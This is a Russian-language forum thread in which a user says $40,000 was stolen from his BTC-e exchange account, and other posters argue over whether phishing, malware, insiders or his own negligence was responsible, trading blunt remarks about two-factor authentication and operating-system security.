Пропали 40 К долларов на btc-e

[Godzilla99]

ВНИМАНИЕ!!! на BTC-e пропали 40 000 долларов, при этом почта взломана не была, вор просто проторговал мне в убыток все мои деньги покупая и продавая LTC на торгах! При контактах с саппортом они на мои запросы провести расследование отвечают следующее

"Здравствуйте! Спасибо за обращение в
Службу поддержки биржи BTC-e. Мы
проводим расследование только в
случае официального запроса из
полиции. Биржа со своей стороны делает
все возможное для защиты средства
пользователей, но мы не можем
гарантировать сохранность средств,
если пользователь не беспокоится о
мерах безопасности счета. Вам
необходимо установить 2ФА, добавить
свой IP в Белый список, проверить
безопасность своего компьютера. Если
у Вас возникнут дополнительные
вопросы, пожалуйста, обращайтесь. С
уважением, Служба поддержки BTC-e"

И все в таком же духе что типа сам виноват а пароль у тебя увел злой хакер вычислить которого мы не можем и не собираемся заморачиваться!
Также по истории входов и то как это было сделано большое подозрение падает на сотрудников кого то из работников btc-e.
1) Вход вор совершил один раз во время ограбления вся операция у него заняла 30 мин! он продавал и покупал лайткоины с моего счета видимо хорошо подготовившись с другого! Также было идеально подгадано время когда стакан был минимален а его прибыль максимальна!
2) Чтобы максимизировать прибыль количество денег у хакера тоже должно было быть приличное на счетах!
3) Почта не была взломана, а если как предполагает btc-e у меня на компе троян значит почту бы тоже стащили, и через подтверждение по почте и в битки вывести было бы проще как минимум и эффективнее в два раза
4) Если же "не вирус троян" у меня на mac у опытного пользователя значит дыра в их  безопасном соединении и значит пароль перехватить может каждый начинающий хакер а соответственно безопасность средств на бирже вызывает большое сомнение и она пойдет следом за MTGOX
5) Попасться на фишинг это очень маловероятно! Но предположим даже если так, но тогда зайти надо было как минимум один раз еще до этого удостовериться что там лежат деньги и потом уже готовить операцию! Но это был единственный вход вора! Вот он вошел увидел деньги и тут опа какая удача а у него уже везде стоят нужные ордера!
6) Они говорят про официальный запрос из полиции! Так из полиции какого государства им нужен запрос? КИпра? Нигерии? России?
7) Они говорят что я не установил двухфакторную авторизацию типа мы же говорили! Да не поставил потому что пользуюсь компьютером очень аккуратно, а телефоны теряю регулярно и последующий геммор с блокировкой счета на две недели не хотел! Но я опытный пользователь и очень маловероятно попался на простые методы кражи пароля (троян фишинг)! Скорее всего их украл кто-то из сотрудников btc-e, или же соединение с биржой небезопасно априори и кто то может взломать их протокол безопасности!

[1714969675]

1714969675

[1714969675]

1714969675

[daddybios]

"Они говорят что я не установил двухфакторную авторизацию"

Вот и я без "нее" на биржах...  а надо бы.
Жаль, пиз..ц подкрался незаметно

[booktiger]

Зачем телефон ?, есть плагин  google authenticator for chrome и mozila

[SStalin]

"Пропали 40 К долларов на btc-e"

[Balthazar]

Зачем телефон ?, есть плагин  google authenticator for chrome и mozila

Затем, что ключ 2FA должен лежать в недоступном месте. А не на той же машине, где авторизация происходит, иначе в ней никакого смысла и вовсе нет.

[ZPK]

2фа последний рубеж будет,)

Даже имея всё пароли чтобы зайти в акк, её придётся вырубать злоумышленнику, автоматом акк лочится после этого на 2 недельки. )

[2btx]

Если на вас была направленная фишинг атака (то есть был создан фейк конкретно на бтц-е или же на все популярные биржи), баланс был сграблен (то есть баланс был извлечен как и ваш логин и пароль, только по средствам ява скрипт). Существую более продвинутые способы при атаках типа фишинг, например авто залив, или подмена кошелька вывода. Большинство сайтов дают все необходимые инструменты что бы пользователи не теряли свои деньги.

На мой взгляд саппорт бтц-е абсолютно прав, а чего вы ожидаете, возврата денег? Вы сами не позаботились о своей безопасноти. Кроме токо поставьте себя не место биржи, что мешает вам провести данные действия самому а потом писать жалобы.

[yvv]

На помойках типа btc-e держат деньги только конченные лохи.

[Godzilla99]

Если на вас была направленная фишинг атака (то есть был создан фейк конкретно на бтц-е или же на все популярные биржи), баланс был сграблен (то есть баланс был извлечен как и ваш логин и пароль, только по средствам ява скрипт). Существую более продвинутые способы при атаках типа фишинг, например авто залив, или подмена кошелька вывода. Большинство сайтов дают все необходимые инструменты что бы пользователи не теряли свои деньги.

На мой взгляд саппорт бтц-е абсолютно прав, а чего вы ожидаете, возврата денег? Вы сами не позаботились о своей безопасноти. Кроме токо поставьте себя не место биржи, что мешает вам провести данные действия самому а потом писать жалобы.

Я ожидаю расследования ситуации, внутреннего расследования, потому что то как были украдены деньги предполагает что кто то из сотрудников биржи был в комманде

[SStalin]

На помойках типа btc-e держат деньги только конченные лохи.

+1

[realnatural108]

На помойках типа btc-e держат деньги только конченные лохи.

а где ты посоветуешь держать суммы over 1kk USD ? на оффшоре ?

[booktiger]

Кто нибудь пробовал Метатрейдер использовать на btc-e ?

[UraN]

API ключ юзали как вариант. Сейчас много всяких "десктопных торговых терминалов" и "биржевых ботов" от Васи Пупкина. Или сам бот/терминал был целью атаки.

[2btx]

На помойках типа btc-e держат деньги только конченные лохи.

а где ты посоветуешь держать суммы over 1kk USD ? на оффшоре ?

Когда у вас появиться хотя бы 1/4 этой суммы вы не будете задаваться такими вопросами.
Инвестируйте, если нету дружественного банка в офшоре.

[Yaremi]

Наставите всякой проприетарной фигни на свой комп. А потом ноете что взломали.

[yvv]

На помойках типа btc-e держат деньги только конченные лохи.

а где ты посоветуешь держать суммы over 1kk USD ? на оффшоре ?

В своём холодном кошельке. Но на оффшоре тоже можно, всяко безопаснее btc-e.

[tvskit]

А где скриншоты?
Да и сапорт так еще ни разу не писал, какая полиция?

[Godzilla99]

Вот тренд на битсеке там и скриншоты и вся история
https://forum.bits.media/index.php?/topic/11484-vnimanie-s-birzhi-btc-ecom-ukrali-40-000-dollarov/page-2

Вот  скриншот моего эккаунта http://takebin.com/u/0FC2B0F46c
Вот скриншоты действий вора с моега эккаунта немного в разнобой там восемь страниц историии а скриншотов 20 я их все в RTF сохранил
а это некоторые из них для подтверждения что я не троль и не просто так здесь
переписку с поддержкой пока не выкладываю потому что они сказали что ведется расследование надеюсь может они наконец признают что это их хакнули а не меня, ну или хотя бы математически докажут  что хакнули меня
http://takebin.com/u/b388b2046f
http://takebin.com/u/1F62B33F07
http://takebin.com/u/a672126fAa
http://takebin.com/u/263275A427
И так далее но скриншоты это неудобно, если кто хочет разобраться вот файл RTF где вся история угона
http://takebin.com/u/5141367820

[Godzilla99]

А вот информация по поводу уязвимости SSL и TLS протоколов на уровне архитектуры!!!
На английском
http://resources.infosecinstitute.com/end-ssl-poodle/
На русском
 Вот здесь на русском доступно:
https://xakep.ru/2014/10/15/poodle
 И TLS тоже уязвим:
https://xakep.ru/2014/12/09/poodle-tls

[2btx]

А вот информация по поводу уязвимости SSL и TLS протоколов на уровне архитектуры!!!
На английском
http://resources.infosecinstitute.com/end-ssl-poodle/
На русском
 Вот здесь на русском доступно:
https://xakep.ru/2014/10/15/poodle
 И TLS тоже уязвим:
https://xakep.ru/2014/12/09/poodle-tls

Данная уязвимость уже давно не актуальна для 99% крупных сайтов.

На btc-e данная уязвимость была устранена до паблик релиза.
Лично проверял.

[Godzilla99]

>> https://bitcointalk.org/index.php?topic=954717.msg10477656#msg10477656
Уязвимость о который вы говорите если бы она существовала, можно было отснифать все логины пароли всех пользователей кто входил на btc-e с ноября 2014. В ссылке на топик выше я уже отписал о этой уязвимости и btc-e.

hxxps://filippo.io/Heartbleed/ <<< здесь вы можете проверить сайт да данную уязвимость.
hxxps://www.youtube.com/watch?v=iNQuMG6hdzE <<< здесь можно глянуть как эксплатируется данная уязвимость на примере.

Двухфакторная авторизация вас бы спасла, так как:
1) Ключ действует 45-60 сек.
2) Сессия создается по ip входяшего (по крайней мере так должно быть. Примерно такого вида md5(date.user_id.ip.password), что делает сессии уникальными)
[/quote]

Это я уже понял, что спасла бы! но вопрос не в этом!
1) не исключено что пароли биржи уже украдены с узла с которого я заходил просто там или двух факторка или денег нет (ведь далеко не все заходят через тор же и еще очень много через впн и много еще но)
2) Про двух факторку я не знал и когда я начинал я не планировал держать большие деньги так что я не особо уделил этому вопросу  а потом как то прошел мимо, но если у них там дырявое ведро в плане безопасности то они должны вводить двухфакторку обязательным условием работы! ведь подтверждение по email это же необходимое условие для вывода денег
3) И все же я не нарушил никаких правил биржи (может я не последовал всем советам) и все же если хакер получил пароль не тем путем что вы описываете а взломав их протокол или изнутри а потом прикинулся хакером со стороны и забрал мои деньги в этом случае они обязаны провести расследование и вернуть деньги! да и в конце концов если они проведут расследование по сделкам и получателям основным ip и тд там могут быть следы и доказательства и следы!

То как они отреагировали сначала вообще возмутительно типа неустановил 2ФА иди гуляй!

[2btx]

Мне очень жаль ваши деньги и сочуствую вам в вашей ситуации.

Я пытаюсь донести вам одно, когда взламывают "биржу" не кто не трогает пользователей, можете почитать об этом на примерах всех публичных взломов бирж, обменников и т.д. Так что если бы случилось то что вы предполагает вы как минимум увидели бы сайт биржи оффлайн минимум 3-5 часов. И украли бы горячие пурсы как минимум.

взломав их протокол или изнутри

Они используют протоколы HTTP/HTTPS/Bitcoin/SMTP и др. более низкие. При нахождение в них уязвимости не кто бы не позарился на ваши 40к.

они обязаны провести расследование и вернуть деньги!

Идете в полицию открываете дело, если вам повезет и дело дойдет до запроса, я думаю btc-e может поднять логи стакана и сообщить по каким аккаунтам разошолся ваш ордер. Далее вы получите почту и IP входа этих аккаунтов (При официальном запросе полиции). Далее они должны вычислить и задержать злоумышленика, далее суд, возврат ваших денег. Сама биржа вам нечего возмещать не будет.

По моему опыту, могу вам сказать, скорей всего это был троян/кейлогер, либо кто то локально украл ваши данные, логин пароль или апи ключ. Скажу более: 50% что вы знаете этого человека лично. 90% что он был в курсе что вы торгуете и вожможно вы упоминали где то что у вас там не 1000 руб.

Мой совет забыть, и начать более внимательно относиться к своей безопастности.

хех... пора меня в сапорт btc-e брать 

[Godzilla99]

Мне очень жаль ваши деньги и сочуствую вам в вашей ситуации.

Я пытаюсь донести вам одно, когда взламывают "биржу" не кто не трогает пользователей, можете почитать об этом на примерах всех публичных взломов бирж, обменников и т.д. Так что если бы случилось то что вы предполагает вы как минимум увидели бы сайт биржи оффлайн минимум 3-5 часов. И украли бы горячие пурсы как минимум.

взломав их протокол или изнутри

Они используют протоколы HTTP/HTTPS/Bitcoin/SMTP и др. более низкие. При нахождение в них уязвимости не кто бы не позарился на ваши 40к.

они обязаны провести расследование и вернуть деньги!

Идете в полицию открываете дело, если вам повезет и дело дойдет до запроса, я думаю btc-e может поднять логи стакана и сообщить по каким аккаунтам разошолся ваш ордер. Далее вы получите почту и IP входа этих аккаунтов (При официальном запросе полиции). Далее они должны вычислить и задержать злоумышленика, далее суд, возврат ваших денег. Сама биржа вам нечего возмещать не будет.

По моему опыту, могу вам сказать, скорей всего это был троян/кейлогер, либо кто то локально украл ваши данные, логин пароль или апи ключ. Скажу более: 50% что вы знаете этого человека лично. 90% что он был в курсе что вы торгуете и вожможно вы упоминали где то что у вас там не 1000 руб.

Мой совет забыть, и начать более внимательно относиться к своей безопастности

хех... пора меня в сапорт btc-e брать 

Дело в том что  keylogger это лишь ваше предположение! А факт в том что у меня на мас нету не логгеров не троянов! Я проверил! И если они не вернут мне 40 К то я сделаю все и напишу в серьезные издания чтобы все узнали! Чтобы осадочек как говориться остался! А даже если меня хакнули! То их знания о безопасности в этой области по сравнению с моими как у образованного взрослого по сравнению с ребенком! Никто не может в этом мире знать всего! И если их они мне настоятельно не рекомендовали или вообще не сделали это обязательным условием то значит они неправильные пчелы и пусть все об этом знают! Да и еще когда я в тот же день обратился к ним с информацией что меня хакнули они не предприняли ровным счетом ничего, а вот сейчас же поставили холд на всей бирже на вывод битков с чего бы это? Могли это и тогда сделать когда я написал об этом! и тогда может и можно было спасти деньги!

[SStalin]

И если они не вернут мне 40 К то я сделаю все и напишу в серьезные издания чтобы все узнали! Чтобы осадочек как говориться остался!

да им, как  в общем и всем похуй.

[SectorZero]

И если они не вернут мне 40 К то я сделаю все и напишу в серьезные издания чтобы все узнали! Чтобы осадочек как говориться остался!

да им, как  в общем и всем похуй.

И это правда. И поэтому биткоин никогда не станет массовым продуктом.
Люди пока не научились строить деловые отношения на личном доверии.  Нужны юридические гарантии. Но они так или иначе противоречат концепции биткоина.

[FAN]

про вариант засланного козачка пока забудем...

если отбросить вариант что пользователь сам все проделала

как возможные варианты увода пасса от акка
- юзание мобилок для входа на биржу (все остается в кешах)
- юзание оперы (ходит через прокси и все кешируется на проксиках)
- юзание шарового фиви соседа или гамдональса
- юзание проксиков или торов и прочей лабуды
...

смысл бирже с хорошими оборотами так мелочиться? уж если хлопать дверью по своей репутации то громко и на все...
смысл бирже держать в штате гнилых сотрудников?

ps: сам несколько раз лажал: вместо все покупать все продавал, вместо покупки одного покупаешь другого по недосмотру... вариантов масса, но это же не повод когото обвинять если сам виноват

[Godzilla99]

про вариант засланного козачка пока забудем...

если отбросить вариант что пользователь сам все проделала

как возможные варианты увода пасса от акка
- юзание мобилок для входа на биржу (все остается в кешах)
- юзание оперы (ходит через прокси и все кешируется на проксиках)
- юзание шарового фиви соседа или гамдональса
- юзание проксиков или торов и прочей лабуды
...

смысл бирже с хорошими оборотами так мелочиться? уж если хлопать дверью по своей репутации то громко и на все...
смысл бирже держать в штате гнилых сотрудников?

ps: сам несколько раз лажал: вместо все покупать все продавал, вместо покупки одного покупаешь другого по недосмотру... вариантов масса, но это же не повод когото обвинять если сам виноват

во первых не я первый не я последний
forum.bits.media/index.php?/topic/7418-ukrali-vse-sredstva-s-akkaunta-btc-e/page-17
во вторых
Если внимательно посмотреть на графики то там 7го февраля в 3-30 утра (когда вошли в мой аккаунт) и ранее в 1-30 утра идет просадка по цене лайта за Юань до 1го Юаня за лайт! и при этом обьемы в эти минуты были очень приличные по лайту по сравнению с другими отрезками времени (bitcoinwisdom.com/markets/btce/ltccnh), совпадение или кого то еще взломали в этот день?
Или такой везучий хакер что аж некуда на его трояны попались аж две жирные рыбы! Ну с таким везением он может в лас-вегас ехать и там в рулетку играть на 0! все равно выиграет!
Остается очевидный вывод все-таки козачек был или же взломали протокол биржи она просто боится признаться!!!
В третьих
Держать крысу у себя в штате они может и не хотят, но пойди найди ее! Ух сколько сюжетов драмматических в голливуде расписано вокруг крысы в темном углу, которую ни Сильвестр, ни Де Ниро ни Аль пачино найти никак не могут!

[2btx]

как возможные варианты увода пасса от акка
- юзание мобилок для входа на биржу (все остается в кешах)
- юзание оперы (ходит через прокси и все кешируется на проксиках)
- юзание шарового фиви соседа или гамдональса
- юзание проксиков или торов и прочей лабуды
...

Вы не знаете о чем говорите... полный бред... более возможное

- юзание бумаги и ручки (все кешируется на бумаге)

[Poltora]

"Если внимательно посмотреть на графики то там 7го февраля..." Пример сливовой торговли заурядным ботом?

[Poltora]

во вторых
Если внимательно посмотреть на графики то там 7го февраля в 3-30 утра (когда вошли в мой аккаунт) и ранее в 1-30 утра идет просадка по цене лайта за Юань до 1го Юаня за лайт!
[/quote]

Из каких ВАШИХ данных видно время 1-30?

[Poltora]

И потом...Это наверное только Годзиллы заводят так беспечно 40к зелени после Новогодней акции (оборот в битках=0)...И спохватываются после 07.02.2015 только через неделю-а хде мои 40К

[Godzilla99]

вот история сделок всех в тот день c моего эккаунта
http://takebin.com/u/ddc185a5A5
вот скриншот  моего аккаунта
http://takebin.com/u/0FC2B0F46c
вот скриншоты моих сделок что выложены выше в  pdf
в качестве подтверждения
http://takebin.com/u/b388b2046f

http://takebin.com/u/1F62B33F07

http://takebin.com/u/a672126fAa

Вот здесь можно посмотреть свечки торгов по 07.02.2015 - 3.30 когда меня взломали и 2 часа ранее в 1.30

[Godzilla99]

во вторых
Если внимательно посмотреть на графики то там 7го февраля в 3-30 утра (когда вошли в мой аккаунт) и ранее в 1-30 утра идет просадка по цене лайта за Юань до 1го Юаня за лайт!

Из каких ВАШИХ данных видно время 1-30?
[/quote]

bitcoinwisdom.com/markets/btce/ltccnh) - вот здесь можете посмотреть и убедиться

[Poltora]

Если мне не изменяет память, в форумы ты написал, минимум через неделю после 07.02.2015...Где раньше был?

[Poltora]

Не вижу смысла повторяться на этом форуме. Все претензии к ТС выразил в https://forum.bits.media/index.php?/topic/11484-vnimanie-s-birzhi-btc-ecom-ukrali-40-000-dollarov/

[Yaremi]

В общем ТС. На будущее.

https://bitshares.org/

И всё будет ровно. бекапы делать главное не забывай.

[Godzilla99]

Если мне не изменяет память, в форумы ты написал, минимум через неделю после 07.02.2015...Где раньше был?

Дорогой друг! Какие ты претензии вообще ко мне иметь можешь
Если у тебя когда нибудь будут 40 к и их спиздят у тебя хакеры (или кто либо еще), И это будет подавляющая часть твоего капитала, вот тогда ты узнаешь полное расписание своих действий на первую неделю после пропажи!!!! Не буду тебе рассказывать, чтобы не обламывать тебе кайф!

[icreator]

на макинтошах вроде нет вирусях и троянов - там вам не винда дырявая

[becool]

Почему в обоих тредах так мало дельной инфы и логической?
всего 2-3 человека написали дельные коментарии.

Такой важный вопрос как был другой IP почти без внимания, зато куча скриншотов сделок и их обсуждение.

Логично предположить, что раз не было 2ФА а было только подтверждение на почту, то раз хакер сделал через стакан своровал, то он не имел выхода на почту?
Или посчитал такой вариант вывода более длительным и проблемматичным, но пока такого не слышно было.
То есть наверно имел место захват сессии. А этот вопрос вроде гораздо более виндоюзеронезависимый. могли и с маком.

Так и не нашел ответа, а почта то была на другом компе? А попытки то вывода через почту были?
Запросили администрацию почты об IP входов? И что показывают логи были ли стертые письма?
Раз уж имел место вход с чужого IP? Почему не освещается самые важные моменты?
Специально 2 треда одного черного пиара чтобы?
Как можно заявлять что ах я такой спец прям по безопастности, по компам, что-то писать умное с одной стороны, и не затронуть самые важные моменты именно самого вопроса с другой стороны.
Например вход с чужого IP, что там с ящиком почтовым входами не входами IP не IP логами, письмами, стертыми не стертыми.
Зато вот посмотрите мои сделки? Да на кой хер нам смотреть сделки то? Какая разница через какие сделки и какие пары?
Может потому что автор в этот момент только об этом и думал?
Забубенил вторую учетку, зашел в нее через тор, сделаны были до этого боты, продербанил вниз график, думал наварится больше, оказалось просрал больше, и через неделю зачерачил тред обличающий, так было?
Смотрю изобретательность всё увеличивается, уже ботов пишут.
Благо биржа не требует паспорта при регистрации, и можно сколько угодно учеток сделать, да?
Кроме того как верно подметили уже ребята стиль ваших писем совпадает очень уж удачно.
Чувствуется роль человек играет, и играет ее одинаково примерно в разных темах.
Да, были и темы где разные другие люди, но там видно разные люди и видно живые.
Тут "ароматизатор идентичный натуральному", да только сцуко не совсем чувствуется идентичный, аромат не такой насыщенный и глубокий.
Клиент неделю готовился как написать что у него своровали, но так в роль и не вошёл.
Роль она всегда роль, и она сыграна, всегда есть критики которые видят лучше.
Не убедительно играете, и в той и в этой теме люди приметили загвоздочки.
Да и по стилю вопросы есть, уж больно стиль тем и сообщений одинаков, а люди то как бы разные, да?
Помню первые такие темы "обворовала биржа", а дальше под копирку пошли уже.
Хреновые ваши копирки скажу вам, троллинг о том что якобы всё разбираетесь и технически подкованы на 10 страниц, но ни грама по существу, это как? Пустая в этом плане инфа скриншотов сделок то куда? Чтобы просто показать что работал бот? У хакеров бот может и по вэб интерфейсу.
Кстати вот еще дельный вопрос который никто не задал, так сделки то были сделаны через вэб или через API?
А вы сами что-то тоже не осветили, "странно", почему это? Если это изучала биржа, то она должна была вам ответить.
Вы говорите расследование, так какие результаты?
Результаты только что надо было привязать IP и 2ФА?
Обычно биржа давала куда более обширную инфу, даже при более меньших суммах.
Опять же обычно копируют все вопросы и все ответы по тикету.
У вас как-то насчет тикета снова глухо тоже инфы нет.
Люди уже вроде просили показать переписку.
Иначе что вы нам показываете? Скриншоты сделок и слова я разбираюсь в компах и обокрала биржа?
Это всё только на слово поверить.

Варианты ах вот была свечка вниз, биржа должна была заблочить того кто купил дешего, люди в своем уме кто такое пишет? Продавать дёшего или покупать дорого стало преступлением?
Ну просадили эту пару, а если бы прокрутили 100 раз вниз вверх в другой по быстрому так же ботом, который контролит что другие не успевают влезать была бы разница? Больше на комииссии? Так для укравшего всеравно не кровные заработаные?

Всё это видится таким образом что воруют сессию или куки через фишинг или другие атаки используя наверняка сайты которым люди больше доверяют, типа как вариант сайты с графиками.
А уж что ёкарный бобай совершенно ***дь мать его точно это краники! Там реально вирусня всегда и везде, только хитро замаскированая, для самых настойчивых, порция после 100 капчи, порция после 1000ой, да да ловите там свой сыр в мышеловке, надеюсь у людей хватает мозгов не ходить туда с компов где биржа.
Фишинг вполне можно не заметить, не надо говорить крутой мэн и т.д., могут подсунуть, лучше вообще не открывать никакие другие сайты на этом компе.
Соответственно отобрали двух самых крупных кошельков из сворованых в это время сессий и забубенили.
Только так кто-же входил с другово айпи? Может всетаки логин с паролем своровали а не сессию?
Почему про это никто не уточнил?

Топики подобные становятся всё более поганенькими, все под копирку и чем больше написать не по теме сообщений не дающих ровным счетом ничего в вопросе - тем лучше, да?
Уже даже и автора не заботят вопросы а что именно как было сделано.
Он просто сразу ответ фигачит что своровала биржа и всё тут, диалога с людьми тоже нет не ищет, тогда зачем топик?
Просто чтобы было больше и потом тролингом душить этим. а вот было, а вот там смотрите, а вот тут. а вот еще.
Да итишкина жизнь, с одной этой 40к можно за пол года еще 20 подобных топиков наделать. и все под ту же копирку и текст и автор, как и этот!
Раньше такие топики люди писали что обращались за помощью хотя бы разобраться в деталях произошедшего, или помощи искали.
Сейчас уже просто забубенил скриншотов сделок сказал что гуру в макинтоше (учитывая что раньше то все в винде были убедительный аргумент) и готово.
Дальше в том же стиле.

Вот только по сути то ничего, ни про IP, ни про входы, ни про мыла, ни про другой или нет комп с почтой, ни про логин с паролем, ни про... вообще всё остальное.
Только найти где-то там увидел ух ты возможно у биржи беда с шифрацией сертификатом, так тогда бы и обворовали уже давно всех, а не только тебя.
Чисто такой трольский аргумент, вместо того чтобы реальные абстоятельства дела писать.
Ссыкотно писать реальные абстоятельства? Надо с гуру советоваться каждый раз, или думать долго а вдруг посекут что это ты был, да? Вдруг слово не так ляпнешь чего или скрин не того или лог, да?
Или у вас там просто один делает у кого деньги есть, а другой чисто школьник нанятый троль, так он и реально не врубается?
Да, про макинтоши и правда школьники больше знают чем про логи почтового сервера, и удаление писем, да?

Да чего там макинтош? Пиши уж сразу что хакер сидел в макдаке! И тебе сам лично бросил скомканую коробку или бумажку  с запиской "чувак, деньги ушли, спасибо", и вышел из макдака, так было?

Или пострадавший с хакером вместе в одном лице тебе по электронке написали что готово, приступай к подготовке психологической к написанию тем, и ты готовился неделю?

Интересуют все обстоятельства, которые ты как раз скрываешь, а выставляешь только то что не может тебя скомпрометировать, то что ты думал хватит и только этого когда делал, скриншоты одних сделок. Я аж охренел какие ты важные доказательства нам предоставил, смотря на каждый новый скриншот сделок только и думал ну будет еще что или нет.
А потом тебе пришлось неделю придумывать сочинять остальные обстоятельства, но поэтому логи с почты провайдера не пришло в голову попросить. Реально то ты ведь знаешь что никто ничего не воровал, да? Поэтому так мало описал обстоятельства и не провел сам никаких расследований? Красавчик. В полицию ты таки тоже не заявишь, да? Может потому тебе так и ответили, что по известным им особеностям тебя сразу раскусили что это ты сам?
А ты тут нам так умело впаривал, но и мы тебя раскусили, слишком много нестыковочек у тебя.
Если бы реально своровали 40к ты бы сейчас только этим и занимался, и письмо в службу поддержки мыла написал, и нам бы уже выложил ответ сюда. И еще много что, и нас бы спрашивал а что еще надо сделать дальше.
Так кого ты троль паришь?

[yvv]

на макинтошах вроде нет вирусях и троянов - там вам не винда дырявая

О да! А в Омерике девачки не пукают.

[booktiger]

Почему в обоих тредах так мало дельной инфы и логической?
всего 2-3 человека написали дельные коментарии.
Так и не нашел ответа, а почта то была на другом компе? А попытки то вывода через почту были?
Запросили администрацию почты об IP входов? И что показывают логи были ли стертые письма?
Раз уж имел место вход с чужого IP? Почему не освещается самые важные моменты?
Специально 2 треда одного черного пиара чтобы?
Как можно заявлять что ах я такой спец прям по безопастности, по компам, что-то писать умное с одной стороны, и не затронуть самые важные моменты именно самого вопроса с другой стороны.
................................
Или пострадавший с хакером вместе в одном лице тебе по электронке написали что готово, приступай к подготовке психологической к написанию тем, и ты готовился неделю?
..............................
Интересуют все обстоятельства, которые ты как раз скрываешь, а выставляешь только то что не может тебя скомпрометировать, то что ты думал хватит и только этого когда делал, скриншоты одних сделок. Я аж охренел какие ты важные доказательства нам .............................
Так кого ты троль паришь?

Отличный конструктивный разоблачительный пост !

Все равно благодарен господину Godzilla99, благодаря ему я стал параноиком - надеюсь это поможет не попасть в хреновую ситуацию 

[Yaremi]

на макинтошах вроде нет вирусях и троянов - там вам не винда дырявая

О да! А в Омерике девачки не пукают.

Не знаю как в маках и омериках.

Но у меня в линуксе девачки не пукают

Чего и всем желаю. А по сабжу, при правильном использовании мака, вирусов и троянов действительно нету.

[Godzilla99]

Почему в обоих тредах так мало дельной инфы и логической?
всего 2-3 человека написали дельные коментарии.
Так и не нашел ответа, а почта то была на другом компе? А попытки то вывода через почту были?
Запросили администрацию почты об IP входов? И что показывают логи были ли стертые письма?
Раз уж имел место вход с чужого IP? Почему не освещается самые важные моменты?
Специально 2 треда одного черного пиара чтобы?
Как можно заявлять что ах я такой спец прям по безопастности, по компам, что-то писать умное с одной стороны, и не затронуть самые важные моменты именно самого вопроса с другой стороны.
................................
Или пострадавший с хакером вместе в одном лице тебе по электронке написали что готово, приступай к подготовке психологической к написанию тем, и ты готовился неделю?
..............................
Интересуют все обстоятельства, которые ты как раз скрываешь, а выставляешь только то что не может тебя скомпрометировать, то что ты думал хватит и только этого когда делал, скриншоты одних сделок. Я аж охренел какие ты важные доказательства нам .............................
Так кого ты троль паришь?

Отличный конструктивный разоблачительный пост !

Все равно благодарен господину Godzilla99, благодаря ему я стал параноиком - надеюсь это поможет не попасть в хреновую ситуацию 

Да что там разоблачительного вы о чем, полный не умный бред!! сегодня биржа обещала дать официальные комментарии
 по поводу моего случая на почту а также во всех тредах что я завел!

[Darsy]

becool написал многобукав, но, в принципе, всё верно. Пока что мы видим много лишней инфы во всех тредах про этот взлом, но почти ничего важного.

[2btx]

При правильном использовании .... Нету вирусов...
Напишите список требований к правильному использованию!!! Например: не устанавливать / не запускать бинарные файлы, не выходить в сети даже в локальные, не использывать внешние устройства usb/cd/etc...

А по сабжу, при правильном использовании мака, вирусов и троянов действительно нету.

По твоему использование мак ос дает хотя 100% или хотя бы 80% того что ваш компьютер не будет взломан, затроянен и так далее... ?

Но у меня в линуксе девачки не пукают

Обычно те кто сидят на "линюксе" =) пишут название дистрибютива... или у вас openbsd без графической оболочки а может вообще solaris 4.1.x ...

[Yaremi]

При правильном использовании .... Нету вирусов...
Напишите список требований к правильному использованию!!! Например: не устанавливать / не запускать бинарные файлы, не выходить в сети даже в локальные, не использывать внешние устройства usb/cd/etc...

А по сабжу, при правильном использовании мака, вирусов и троянов действительно нету.

По твоему использование мак ос дает хотя 100% или хотя бы 80% того что ваш компьютер не будет взломан, затроянен и так далее... ?

Но у меня в линуксе девачки не пукают

Обычно те кто сидят на "линюксе" =) пишут название дистрибютива... или у вас openbsd без графической оболочки а может вообще solaris 4.1.x ...

Правильно использование, это установка программ только из магазина приложений. А не всякие крякнутые фотошопы с торрентов. Не тыкать в всякие баннеры и естество наличие в браузере адблока.

openbsd и solaris это не линукс. У меня Ubuntu. Которую за всё время проведения турниров по взлому, не разу не взломали. Когда мак и винду хакали всегда В которую я устанавливаю программное обеспечение только из надёжных репозиториев. А также программы из официальных сайтов с проверкой хеша (например клиент некста.) И разумеется некоторые программы собираю из исходного кода.

[yvv]

У меня Ubuntu. Которую за всё время проведения турниров по взлому, не разу не взломали.

Это не значит, что под неё нет вирусов. Есть они. Взломы тут ни при чём. Вирусы пишут для того, чтоб взламывать не нужно было.

[Yaremi]

У меня Ubuntu. Которую за всё время проведения турниров по взлому, не разу не взломали.

Это не значит, что под неё нет вирусов. Есть они. Взломы тут ни при чём. Вирусы пишут для того, чтоб взламывать не нужно было.

Вирус технически не будет работать в убунде. Почему? Чтоб ему запустится, ему нужно ввести пароль. А пароль знаю только я. Поэтому вирусу нужно сначала взломать меня, а точнее мой мозг. А уже потом когда вирус получил пароль с моего мозга, ему нужно запустится и ввести пароль. Но вот беда. Чтоб ему запустится, ему нужно сделать себя исполняемым. А чтоб сделать себя исполняемым, ему нужно запустится. Поэтому ему кроме того, что, нужно получить пароль из моего мозга, ещё нужно заставить меня сделать его исполняемым, и только после этого вводить пароль.

В общем нет в убунде вирусов. А вирусов которые взломают мой мозг уж нет точно. Тут ещё можно поспорить, является такой вирус под убунду, или это вирус под человека?

[yvv]

У меня Ubuntu. Которую за всё время проведения турниров по взлому, не разу не взломали.

Это не значит, что под неё нет вирусов. Есть они. Взломы тут ни при чём. Вирусы пишут для того, чтоб взламывать не нужно было.

Вирус технически не будет работать в убунде. Почему? Чтоб ему запустится, ему нужно ввести пароль. А пароль знаю только я. Поэтому вирусу нужно сначала взломать меня, а точнее мой мозг. А уже потом когда вирус получил пароль с моего мозга, ему нужно запустится и ввести пароль. Но вот беда. Чтоб ему запустится, ему нужно сделать себя исполняемым. А чтоб сделать себя исполняемым, ему нужно запустится. Поэтому ему кроме того, что, нужно получить пароль из моего мозга, ещё нужно заставить меня сделать его исполняемым, и только после этого вводить пароль.

В общем нет в убунде вирусов. А вирусов которые взломают мой мозг уж нет точно. Тут ещё можно поспорить, является такой вирус под убунду, или это вирус под человека?

Чувак, ничего взламывать не надо. Линукс используют точно такие же дебилы, как и виндовс и макинтош. Вирусная программа никогда не спрашивает пароль. Её присылают дебилу по имайлу, или другим способом, и он сам её запускает, часто от рута. Вылазь уже из эльфийского леса, и загляни правде в глаза, под твои люниксы вирусов такая же невъебенная куча, как и под микрософт.
 

[fsb4000]

Чувак, ничего взламывать не надо. Линукс используют точно такие же дебилы, как и виндовс и макинтош. Вирусная программа никогда не спрашивает пароль. Её присылают дебилу по имайлу, или другим способом, и он сам её запускает, часто от рута. Вылазь уже из эльфийского леса, и загляни правде в глаза, под твои люниксы вирусов такая же невъебенная куча, как и под микрософт.

